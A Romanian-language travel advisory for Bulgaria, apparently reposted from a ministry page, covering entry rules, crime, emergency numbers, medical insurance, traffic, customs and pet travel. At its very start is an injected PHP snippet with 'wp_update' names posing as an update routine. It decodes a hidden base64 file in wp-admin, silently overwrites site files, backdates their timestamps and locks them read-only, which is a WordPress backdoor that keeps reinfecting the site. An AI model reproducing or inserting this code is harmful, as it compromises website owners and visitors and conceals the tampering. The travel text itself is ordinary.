$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Bulgaria – O noua atitudine

Bulgaria

Ultima actualizare:

15 aprilie 2011

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Bulgaria.
Intrarea în Bulgaria este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Pentru verificarea condiţiilor privind intrarea şi stabilirea pe teritoriul Bulgariei, recomandăm consultarea informaţiilor oficiale furnizate de autorităţile bulgare:

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Bulgaria nu poate fi exclusă din faţa acestei ameninţări.

Bulgaria nu a suferit atacuri teroriste directe pe teritoriul naţional.

Vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile bulgare şi să accesaţi periodic pagina web a Ministerului român al Afacerilor Externe.

Siguranţă şi criminalitate

Bulgaria este o ţară cu un nivel mediu al criminalităţii.

Infracţiuni de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

S-au semnalat cazuri de agresiune şi furt de autovehicule pe şoselele naţionale.

Recomandări generale:

  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).
  • Deplasările cu autoturismul să se efectueze numai pe timpul zilei şi pe artere rutiere principale (drumuri europene şi autostrăzi).

În cazul în care vi se solicită să opriţi autoturismul şi aveţi suspiciuni în legătură cu adevărata calitate a persoanelor respective, vă recomandăm evitarea opririi şi deplasarea până la cel mai apropiat post fix sau mobil de poliţie, pentru relatarea situaţiei şi solicitarea de sprijin.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală precum şi cel mai apropiat oficiu consular român.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor bulgare, trebuie apelate următoarele numere de urgenţă:

  • 112 – Servicii de urgenţă
  • 166 – Poliţie
  • 160 – Pompieri
  • 150 – Salvarea

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!

Sistemul medical

Asigurarea medicală este obligatorie în Bulgaria.

Încheierea poliţelor de asigurare trebuie făcută în România, neexistând posibilitatea încheierii lor în Bulgaria.

Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.

Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare.

Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.

Mai multe detalii găsiţi la adresele : www.cnas.ro/ şi www.ceass.ro/.

Este recomandabil să încheiaţi şi o asigurare medicală suplimentară, valabilă în ţara de destinaţie şi cele de tranzit. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.

În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.

Condiţii privind traficul auto

  • Circulaţia auto

Toate reglementările privind circulaţia pe drumurile publice sunt similare cu cele româneşti în domeniu.

Plata utilizării drumurilor publice se efectuează la intrarea pe teritoriul Bulgariei, existând un sistem similar vignetei româneşti. Sunt necesare cartea verde a autoturismului, talon de înmatriculare şi permisul de conducere.

  • Centura de siguranţă

Este obligatorie folosirea centurii de siguranţă.

  • Folosirea telefonului mobil la volan

Este interzisă utilizarea telefoanelor mobile de către şofer, în timpul deplasării cu autoturismul.

  • Parcarea

În marile oraşe există parcări amenajate, prevăzute cu aparate de taxare şi/sau personal de pază şi de încasare a taxelor de parcaj. În cazul parcării neregulamentare sau unde această manevră este interzisă, este posibilă tractarea de către autorităţi a autoturismului la un parcaj special, de unde poate fi recuperat numai după perceperea taxelor aferente.

  • Aparatele anti-radar şi de detectare a radarului

În Bulgaria este interzisă folosirea aparatelor anti-radar.

  • Permisul de conducere:

Permisul de conducere românesc este valabil în Bulgaria.

Atenţie! În cazul în care vă este reţinut permisul şi vi se aplică o amendă contravenţională, agentul de poliţie încheie un proces verbal de contravenţie, care trebuie semnat şi de contravenient. Precizăm că procedura de restituire a permisului prevede ca acesta să fie trimis la Ambasada României la Sofia, numai după expirarea perioadei de suspendare şi plata amenzii contravenţionale. Ambasada îl trimite la MAE, de unde ajunge la autoritatea care l-a eliberat, de la care se poate recupera.

§ Amenzile se plătesc prin transfer bancar în contul precizat în procesul verbal, la oficiile poştale sau la autoritatea menţionată în procesul verbal.

În cazul în care consideraţi că sunteţi victima unui abuz al poliţiei, potrivit legii bulgare a circulaţiei pe drumurile publice puteţi contesta procesul verbal de contravenţie, în termen de 7 zile.

  • Informaţii pentru cazurile de accident de circulaţie

În caz de accident uşor, notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.

Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii de asigurări din Bulgaria.

Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Dacă sunteţi membru al ACR (Automobil Clubul Român), puteţi beneficia de asistenţă apelând telefonul de permanenţă al acestei asociaţii.

Telefoane utile pentru informaţii privind traficul sau conduita în caz de accident:

  • Serviciul european de urgenţe – 112
  • Poliţia – 166
  • Salvarea – 150
  • Informaţii de călătorie pentru transportatori:

Atenţie! Agenţia „Administraţia Automobilistică” (echivalentul ARR din România) efectuează controale rutiere frecvente. Astfel, şoferii de TIR trebuie să fie în măsură să prezinte diagrama tahograf (care să corespundă cerinţelor legale) şi dovada de verificare tahograf.

În cazul unor nereguli la diagrama tahograf se plică amenzi de aproximativ 500 de euro, care trebuie plătite imediat pentru a putea continua călătoria.

Utilizarea cărţilor de credit

În Bulgaria sunt acceptate toate tipurile de cărţi de credit. Acestea pot fi folosite la majoritatea distribuitorilor de produse sau servicii unde sunt afişate însemnele cardurilor şi pot fi utilizate la orice bancomat (ATM). Bancomatele eliberează bancnote naţionale.


Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare, iar acestea să fie în ambalajul original!

Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale.

Antibioticele nu se eliberează decât pe bază de reţetă.

Reglementări vamale

Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 200 bucăţi, 1 litru băuturi alcoolice, parfum 50 ml sau 250 ml apă de toaletă.

Conform legislaţiei bulgare, la intrarea şi la ieşirea în/din Bulgaria se declară în scris bunurile deţinute, precum şi sumele în leva sau valută, însumând peste 10.000 euro.

De asemenea, se declară bijuteriile din aur, platină şi pietre preţioase care depăşesc greutatea de 60 grame (în total). În cazul metalelor preţioase neprelucrate, limita este de 37 grame.

Bijuteriile şi/sau metalele şi pietrele preţioase care depăşesc limitele precizate mai sus, nedeclarate, se confiscă în folosul statului.

Informaţii vamale suplimentare se pot obţine la pagina internet: http://www.customs.bg/bg/page/130

Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.

Animalul trebuie identificat printr-un microcip electronic. Până în iulie 2011, se acceptă, de asemenea, şi un tatuaj lizibil.

Informaţii suplimentare se pot obţine la pagina internet :

http://ec.europa.eu/food/animal/liveanimals/pets/nocomm_intra_en.htm.

By o9admin